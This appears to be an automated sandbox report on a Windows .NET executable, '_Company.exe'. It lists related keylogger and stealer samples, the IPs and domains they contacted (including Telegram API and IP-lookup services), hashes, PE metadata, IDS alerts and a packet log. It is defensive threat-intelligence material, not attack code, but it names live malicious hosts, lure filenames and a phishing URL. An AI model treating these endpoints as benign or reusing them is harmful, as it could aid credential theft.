                                                                                            Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              PAYMENT SWIFT AND SOA TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                chrome11.exeGet hashmaliciousUnknownBrowse
                                                                                                  chrome11.exeGet hashmaliciousUnknownBrowse
                                                                                                    urS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                                                                                                      urS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                                                                                                        RFQ December-January Forcast and TCL.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          FileScanner.exeGet hashmaliciousUnknownBrowse
                                                                                                            104.21.67.1520001.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                PAYMENT SWIFT AND SOA TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                  87h216Snb7.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                    TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      PAYMENT ADVICE TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                        HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                          hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                            Justificante pago-09453256434687.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                              pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                158.101.44.242PAYMENT SWIFT AND SOA TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                • checkip.dyndns.org/
                                                                                                                                RFQ December-January Forcast and TCL.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                • checkip.dyndns.org/
                                                                                                                                TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • checkip.dyndns.org/
                                                                                                                                PAYMENT ADVICE TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                • checkip.dyndns.org/
                                                                                                                                Justificante pago-09453256434687.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • checkip.dyndns.org/
                                                                                                                                pedido-035241.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • checkip.dyndns.org/
                                                                                                                                FT876567090.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • checkip.dyndns.org/
                                                                                                                                REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                • checkip.dyndns.org/
                                                                                                                                PURCHASE ORDER 006-2024 GIA-AV Rev 1_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                • checkip.dyndns.org/
                                                                                                                                REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                • checkip.dyndns.org/
                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                checkip.dyndns.comF.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                • 132.226.8.169
                                                                                                                                D.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                • 132.226.247.73
                                                                                                                                0001.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                • 132.226.8.169
                                                                                                                                Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 132.226.247.73
                                                                                                                                PAYMENT SWIFT AND SOA TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                • 193.122.6.168
                                                                                                                                RFQ December-January Forcast and TCL.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                • 158.101.44.242
                                                                                                                                Invoice.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                • 193.122.6.168
                                                                                                                                PK241200518-EMAIL RELEASE-pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 132.226.8.169
                                                                                                                                ugpJX5h56S.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 132.226.247.73
                                                                                                                                87h216Snb7.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                • 193.122.130.0
                                                                                                                                reallyfreegeoip.org0001.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                • 104.21.67.152
                                                                                                                                Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 104.21.67.152
                                                                                                                                PAYMENT SWIFT AND SOA TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                • 104.21.67.152
                                                                                                                                RFQ December-January Forcast and TCL.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                • 172.67.177.134
                                                                                                                                Invoice.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                • 172.67.177.134
                                                                                                                                PK241200518-EMAIL RELEASE-pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 172.67.177.134
                                                                                                                                ugpJX5h56S.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 172.67.177.134
                                                                                                                                87h216Snb7.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                • 104.21.67.152
                                                                                                                                TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 104.21.67.152
                                                                                                                                MV GOLDEN SCHULTE DETAILS.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                • 172.67.177.134
                                                                                                                                api.telegram.orgF.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                • 149.154.167.220
                                                                                                                                D.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                • 149.154.167.220
                                                                                                                                Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 149.154.167.220
                                                                                                                                PAYMENT SWIFT AND SOA TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                • 149.154.167.220
                                                                                                                                chrome11.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 149.154.167.220
                                                                                                                                chrome11.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 149.154.167.220
                                                                                                                                random.exe.6.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, VidarBrowse
                                                                                                                                • 149.154.167.220
                                                                                                                                urS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                                                                                                                                • 149.154.167.220
                                                                                                                                urS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                                                                                                                                • 149.154.167.220
                                                                                                                                RFQ December-January Forcast and TCL.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                • 149.154.167.220
                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                TELEGRAMRUF.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                • 149.154.167.220
                                                                                                                                D.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                • 149.154.167.220
                                                                                                                                Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 149.154.167.220
                                                                                                                                PAYMENT SWIFT AND SOA TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                • 149.154.167.220
                                                                                                                                chrome11.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 149.154.167.220
                                                                                                                                chrome11.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 149.154.167.220
                                                                                                                                noll.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                • 149.154.167.99
                                                                                                                                urS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                                                                                                                                • 149.154.167.220
                                                                                                                                urS3jQ9qb5.jarGet hashmaliciousCan StealerBrowse
                                                                                                                                • 149.154.167.220
                                                                                                                                RFQ December-January Forcast and TCL.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                • 149.154.167.220
                                                                                                                                CLOUDFLARENETUShttps://shorturl.at/roHtaGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                • 104.26.8.129
                                                                                                                                https://www.grapevine.org/join/next-gen-giving-circle-dcGet hashmaliciousUnknownBrowse
                                                                                                                                • 104.16.117.116
                                                                                                                                https://www.google.com/url?q=https%3A%2F%2Fjollybos.es%2Fwills&sa=D&sntz=1&usg=AOvVaw1qWh2KPHS1VH9DwguQzCFrGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                • 172.67.187.179
                                                                                                                                http://bluepeak-group.com/fcGet hashmaliciousUnknownBrowse
                                                                                                                                • 172.67.68.137
                                                                                                                                VKJITO.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                                                                                • 104.26.13.31
                                                                                                                                VKJITO.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                                                                                • 104.26.12.31
                                                                                                                                https://i.donotreply.biz/XWTZMVjBsbS9FS1Z2NzBoRzFZMy83RkoxVmlXaWlxaHo3VWFucmtuUGw1enh1ZWNEWVVSRmU5SURkU2psUnlGWUVLSzJtc3hJMVRZeXdZQTdKTVMwOTIySXc0dXRmSmkrKzVTSFFkRTlsZ0sycWdFdnhVY3BJNGx5ZnRmWTFhc0tuTTN1bVNUeUdFYkgrRW9rVllXdnIvNEE4aUgwNlR0R291UUxXUmY2L1JsVnZyNmMvbVpoUGJac04xckVKQlBXLS1PZFpzV3ByWmxpaEJybUhrLS1uMXVPRk5IWXlyNFBPNklpRkk0NTB3PT0=?cid=2330206445Get hashmaliciousKnowBe4Browse
                                                                                                                                • 104.17.247.203
                                                                                                                                0001.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                • 104.21.67.152
                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, StealcBrowse
                                                                                                                                • 104.21.12.88
                                                                                                                                0Vwp4nJQOc.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                • 172.67.179.109
                                                                                                                                CLOUDFLARENETUShttps://shorturl.at/roHtaGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                • 104.26.8.129
                                                                                                                                https://www.grapevine.org/join/next-gen-giving-circle-dcGet hashmaliciousUnknownBrowse
                                                                                                                                • 104.16.117.116
                                                                                                                                https://www.google.com/url?q=https%3A%2F%2Fjollybos.es%2Fwills&sa=D&sntz=1&usg=AOvVaw1qWh2KPHS1VH9DwguQzCFrGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                • 172.67.187.179
                                                                                                                                http://bluepeak-group.com/fcGet hashmaliciousUnknownBrowse
                                                                                                                                • 172.67.68.137
                                                                                                                                VKJITO.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                                                                                • 104.26.13.31
                                                                                                                                VKJITO.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                                                                                • 104.26.12.31
                                                                                                                                https://i.donotreply.biz/XWTZMVjBsbS9FS1Z2NzBoRzFZMy83RkoxVmlXaWlxaHo3VWFucmtuUGw1enh1ZWNEWVVSRmU5SURkU2psUnlGWUVLSzJtc3hJMVRZeXdZQTdKTVMwOTIySXc0dXRmSmkrKzVTSFFkRTlsZ0sycWdFdnhVY3BJNGx5ZnRmWTFhc0tuTTN1bVNUeUdFYkgrRW9rVllXdnIvNEE4aUgwNlR0R291UUxXUmY2L1JsVnZyNmMvbVpoUGJac04xckVKQlBXLS1PZFpzV3ByWmxpaEJybUhrLS1uMXVPRk5IWXlyNFBPNklpRkk0NTB3PT0=?cid=2330206445Get hashmaliciousKnowBe4Browse
                                                                                                                                • 104.17.247.203
                                                                                                                                0001.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                • 104.21.67.152
                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, StealcBrowse
                                                                                                                                • 104.21.12.88
                                                                                                                                0Vwp4nJQOc.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                • 172.67.179.109
                                                                                                                                ORACLE-BMC-31898USPAYMENT SWIFT AND SOA TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                • 158.101.44.242
                                                                                                                                RFQ December-January Forcast and TCL.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                • 158.101.44.242
                                                                                                                                x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                • 192.29.189.21
                                                                                                                                Invoice.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                • 193.122.6.168
                                                                                                                                jew.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                • 147.154.227.181
                                                                                                                                87h216Snb7.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                • 193.122.130.0
                                                                                                                                dP5z8RpEyQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                • 193.122.130.0
                                                                                                                                https://machino.com/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                                • 152.67.3.57
                                                                                                                                TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 158.101.44.242
                                                                                                                                MV GOLDEN SCHULTE DETAILS.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                • 193.122.6.168
                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                54328bd36c14bd82ddaa0c04b25ed9ad0001.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                • 104.21.67.152
                                                                                                                                Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 104.21.67.152
                                                                                                                                PAYMENT SWIFT AND SOA TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                • 104.21.67.152
                                                                                                                                RFQ December-January Forcast and TCL.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                • 104.21.67.152
                                                                                                                                Invoice.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                • 104.21.67.152
                                                                                                                                PK241200518-EMAIL RELEASE-pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 104.21.67.152
                                                                                                                                ugpJX5h56S.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 104.21.67.152
                                                                                                                                87h216Snb7.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                • 104.21.67.152
                                                                                                                                Ls4O6Pmixd.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                                                                • 104.21.67.152
                                                                                                                                TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 104.21.67.152
                                                                                                                                3b5074b1b5d032e5620f69f9f700ff0e1734537007a22115ccf81804870f6743791426a5c4263cfc792e757756373d12e0d21d0600610.dat-decoded.exeGet hashmaliciousAsyncRATBrowse
                                                                                                                                • 149.154.167.220
                                                                                                                                F.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                • 149.154.167.220
                                                                                                                                D.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                • 149.154.167.220
                                                                                                                                https://launch.app/plainsartGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                • 149.154.167.220
                                                                                                                                https://pluginvest.freshdesk.com/en/support/solutions/articles/157000010678-pluginvest-laadoplossingGet hashmaliciousUnknownBrowse
                                                                                                                                • 149.154.167.220
                                                                                                                                yoyf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 149.154.167.220
                                                                                                                                yoyf.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 149.154.167.220
                                                                                                                                hnsjdghf18.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                • 149.154.167.220
                                                                                                                                kjshdgacg18.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                • 149.154.167.220
                                                                                                                                Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 149.154.167.220
                                                                                                                                No context
                                                                                                                                No created / dropped files found
                                                                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                Entropy (8bit):7.739408365402643
                                                                                                                                TrID:
                                                                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                                • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                File name:_Company.exe
                                                                                                                                File size:486'400 bytes
                                                                                                                                MD5:aff56992589dfb76554ea1416c3e99d1
                                                                                                                                SHA1:7a3e430720860af04ca1e8d029f60749cd98812b
                                                                                                                                SHA256:e5dea0ef10ebb4aa8bb909e2bcbb6efb37b32e3bd9fed8deeed60a3aa6130d06
                                                                                                                                SHA512:642e5d23657efaac332defce18cb87dae389e538188b146d4c2ccb71e3aa882ccf3b82dbb4da48464bb4f4d79a6b1ff5c6690f98088767fde3be6fb2f7fc823a
                                                                                                                                SSDEEP:6144:OkDVQ0CF04tNSJuhGVJRl3+iRfD5NDtWcKpXIlxGQY6D3ST4vHoGGV8VTCAvM72q:QfYCeDXRKIxGQYT+HimCmZi+1xaIBR
                                                                                                                                TLSH:CAA4F18455C2782FEEEAAA75422574A0531FF14E6B63851B420DF748FDAC6CE0F42ED1
                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...T.................0..b............... ........@.. ....................................@................................
                                                                                                                                Icon Hash:00928e8e8686b000
                                                                                                                                Entrypoint:0x4780fe
                                                                                                                                Entrypoint Section:.text
                                                                                                                                Digitally signed:false
                                                                                                                                Imagebase:0x400000
                                                                                                                                Subsystem:windows gui
                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                Time Stamp:0x86919054 [Wed Jul 17 15:10:12 2041 UTC]
                                                                                                                                TLS Callbacks:
                                                                                                                                CLR (.Net) Version:
                                                                                                                                OS Version Major:4
                                                                                                                                OS Version Minor:0
                                                                                                                                File Version Major:4
                                                                                                                                File Version Minor:0
                                                                                                                                Subsystem Version Major:4
                                                                                                                                Subsystem Version Minor:0
                                                                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                Instruction
                                                                                                                                jmp dword ptr [00402000h]
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                add byte ptr [eax], al
                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x780b00x4b.text
                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x7a0000x586.rsrc
                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x7c0000xc.reloc
                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                .text0x20000x761040x762001112f887cad49bd2d34fe0e9bab366aaFalse0.6626880787037037data7.746330065690188IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                .rsrc0x7a0000x5860x6004de767c9ff28b65be637a9be406bb1d9False0.4127604166666667data4.010295709173847IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                .reloc0x7c0000xc0x2000b5f5bf1c0dbc3c104321dc72db77bbdFalse0.041015625data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                RT_VERSION0x7a0a00x2fcdata0.43455497382198954
                                                                                                                                RT_MANIFEST0x7a39c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                                                                DLLImport
                                                                                                                                mscoree.dll_CorExeMain
                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                2024-12-18T17:07:17.949510+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649716158.101.44.24280TCP
                                                                                                                                2024-12-18T17:07:20.230737+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649716158.101.44.24280TCP
                                                                                                                                2024-12-18T17:07:21.982022+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.649728104.21.67.152443TCP
                                                                                                                                2024-12-18T17:07:23.371363+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649736158.101.44.24280TCP
                                                                                                                                2024-12-18T17:07:26.402613+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649747158.101.44.24280TCP
                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                Dec 18, 2024 17:07:16.166807890 CET4971680192.168.2.6158.101.44.242
                                                                                                                                Dec 18, 2024 17:07:16.288275003 CET8049716158.101.44.242192.168.2.6
                                                                                                                                Dec 18, 2024 17:07:16.288379908 CET4971680192.168.2.6158.101.44.242
                                                                                                                                Dec 18, 2024 17:07:16.288747072 CET4971680192.168.2.6158.101.44.242
                                                                                                                                Dec 18, 2024 17:07:16.409770966 CET8049716158.101.44.242192.168.2.6
                                                                                                                                Dec 18, 2024 17:07:17.508570910 CET8049716158.101.44.242192.168.2.6
                                                                                                                                Dec 18, 2024 17:07:17.513204098 CET4971680192.168.2.6158.101.44.242
                                                                                                                                Dec 18, 2024 17:07:17.632956028 CET8049716158.101.44.242192.168.2.6
                                                                                                                                Dec 18, 2024 17:07:17.904112101 CET8049716158.101.44.242192.168.2.6
                                                                                                                                Dec 18, 2024 17:07:17.949510098 CET4971680192.168.2.6158.101.44.242
                                                                                                                                Dec 18, 2024 17:07:18.089199066 CET49724443192.168.2.6104.21.67.152
                                                                                                                                Dec 18, 2024 17:07:18.089255095 CET44349724104.21.67.152192.168.2.6
                                                                                                                                Dec 18, 2024 17:07:18.090146065 CET49724443192.168.2.6104.21.67.152
                                                                                                                                Dec 18, 2024 17:07:18.103534937 CET49724443192.168.2.6104.21.67.152
                                                                                                                                Dec 18, 2024 17:07:18.103571892 CET44349724104.21.67.152192.168.2.6
